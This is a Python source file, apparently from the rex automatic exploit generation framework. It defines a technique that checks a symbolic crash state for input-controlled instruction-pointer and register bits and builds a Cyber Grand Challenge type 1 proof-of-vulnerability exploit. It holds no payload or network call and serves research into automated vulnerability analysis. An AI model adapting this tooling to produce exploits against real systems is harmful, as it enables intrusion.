import logging
import claripy
from rex import Vulnerability
from rex.exploit import CannotExploit
from rex.exploit.cgc import CGCType1CircumstantialExploit
from ..technique import Technique

# module-level logger shared by everything in this technique
l = logging.getLogger("rex.exploit.techniques.circumstantial_set_register")


class CircumstantialSetRegister(Technique):
    """
    Technique which tries to build a CGC type 1 POV out of the crashing state
    as-is: it looks for a general purpose register which, together with ip,
    has enough input-influenced bits at the time of the crash.
    """

    name = "circumstantially_set_register"
    applicable_to = ['cgc']
    # registers tried by apply(), in this order
    cgc_registers = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
    # minimum bit count (as reported by get_bitmask_for_var) required of both
    # ip and the candidate register
    bitmask_threshold = 20
    # this technique should create an exploit which is a type1 pov
    pov_type = 1
    generates_pov = True

    def __init__(self, crash, rop, shellcode):
        super(CircumstantialSetRegister, self).__init__(crash, rop, shellcode)
        # bitmask / bit count of ip at the crash; filled in by apply() or
        # lazily on the first set_register() call
        self._ip_bitmask = None
        self._ip_bitcnt = None

    def _ensure_ip_bitmask(self):
        """
        Compute the bitmask and bit count of ip if that has not happened yet.

        set_register() is callable without going through apply(); without this
        the threshold check would compare None against an int.
        """
        if self._ip_bitmask is None or self._ip_bitcnt is None:
            state = self.crash.state
            self._ip_bitmask, self._ip_bitcnt = self.get_bitmask_for_var(state, state.regs.ip)

    def set_register(self, register):
        """
        Try to build a circumstantial type 1 exploit which sets `register`.

        :param register: name of the register to set (looked up on state.regs)
        :return: a CGCType1CircumstantialExploit for the register
        :raises CannotExploit: if the crash is not an ip overwrite, if ip or the
                               register has fewer than `bitmask_threshold` bits,
                               if the register cannot differ from pc, or if the
                               register is not tainted by user input
        """

        # can only exploit ip overwrites
        if not self.crash.one_of([Vulnerability.IP_OVERWRITE, Vulnerability.PARTIAL_IP_OVERWRITE]):
            raise CannotExploit("[%s] cannot control ip" % self.name)

        state = self.crash.state

        self._ensure_ip_bitmask()
        if self._ip_bitcnt < CircumstantialSetRegister.bitmask_threshold:
            raise CannotExploit("not enough controlled bits of ip")

        reg = getattr(state.regs, register)

        # we need to make sure that the pc and this register don't conflict,
        # i.e. there must be a solution in which the two hold different values
        if not state.satisfiable(extra_constraints=(reg != state.regs.pc,)):
            raise CannotExploit("register %s conflicts with pc, pc and register must be equal" % register)

        # see if the register value is nearly unconstrained
        reg_bitmask, reg_bitcnt = self.get_bitmask_for_var(state, reg)
        if reg_bitcnt < CircumstantialSetRegister.bitmask_threshold:
            raise CannotExploit("register %s's value does not appear to be unconstrained" % register)

        # symbolic is not enough, the value has to come from the input
        if not any(v.startswith('aeg_input') for v in reg.variables):
            raise CannotExploit("register %s was symbolic but was not tainted by user input" % register)

        l.info("can circumstantially set register %s", register)

        # constrain a copy so the original crash is left untouched
        ccp = self.crash.copy()

        # fresh variables standing in for the final register and ip values
        value_var = claripy.BVS('value_var', 32, explicit_name=True)
        ip_var = claripy.BVS('ip_var', 32, explicit_name=True)

        reg = getattr(ccp.state.regs, register)
        ccp.state.add_constraints(reg == value_var)
        ccp.state.add_constraints(ccp.state.regs.ip == ip_var)

        mem = [reg, ccp.state.regs.ip]

        return CGCType1CircumstantialExploit(ccp, register, reg_bitmask,
                self._ip_bitmask, mem, value_var, ip_var)

    def apply(self, **kwargs):
        """
        Try every register in `cgc_registers` and return the first exploit found.

        :param kwargs: accepted but not used by this technique
        :return: the exploit for the first register which can be set, or None
                 if set_register() raised CannotExploit for every register
        """

        # always recompute from the current crash state
        ip = self.crash.state.regs.ip
        self._ip_bitmask, self._ip_bitcnt = self.get_bitmask_for_var(self.crash.state, ip)

        for register in CircumstantialSetRegister.cgc_registers:
            try:
                reg_setter = self.set_register(register)
            except CannotExploit as e:
                l.debug("could not set register %s circumstantially (%s)", register, e)
            else:
                l.info("was able to set register [%s] circumstantially", register)
                return reg_setter

        # no register worked out
        return None
